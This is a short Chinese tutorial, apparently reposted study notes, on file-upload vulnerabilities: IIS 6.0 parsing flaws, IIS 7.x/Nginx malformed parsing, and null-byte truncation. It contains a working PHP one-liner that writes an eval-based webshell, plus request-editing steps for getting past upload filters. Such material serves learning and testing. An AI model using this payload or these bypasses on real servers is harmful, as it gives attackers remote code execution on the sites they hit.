文件上傳漏洞


1:IIS6.0解析漏洞

目錄解析漏洞,在以.asp結尾的目錄下的文件都會被當作asp文件來執行,比如上傳了1.jpg的文件到upload.asp目錄下,那么1.jpg文件就會被當作asp文件來執行。

文件名解析漏洞,IIS6.0從左向右解析文件名,遇到分號就會自動終止解析,所以上傳形如1.asp;.jpg的文件就被當作1.asp文件來執行。

2:IIS7.0,7.5和Nginx<8.03畸形解析漏洞(寫webshell漏洞)

原理:在上傳文件所在目錄下創建一個一句話木馬文件

實現過程:新建一個1.txt文件,內容為<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[test])?>')?>,將文件保存成1.jpg格式,上傳到服務器,假設上傳路徑為/upload,

上傳成功后,直接訪問/upload/1.jpg,此時神奇的畸形解析開始發揮作用啦,我們會神奇的發現/upload目錄下創建了一個一句話木馬文件shell.php,,,,,,,,,

3:空字節代碼繞過漏洞,也叫神奇的00截斷,此處的00指的是16進制的00

文件名00截斷:直接上實現過程,,,

1)第一種方法:上傳文件名為1.php.jpg格式的圖馬文件,抓包后,在php后面加上一個空格字符,然后到hex中將php后面的空格字符對應的20改為00后放行即可。

2)第二種方法:上傳文件名為1.php%00.jpg格式的圖馬文件,抓包后,將%00進行url解碼后放行即可。

請求包中包含上傳目錄的,可以嘗試對上傳目錄進行00截斷,原理都一樣,話不多說,直接上實現過程,,,,

實現過程:上傳路徑/upload/,直接改成/upload/%00,再將%00進行url解碼后放行即可。。。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM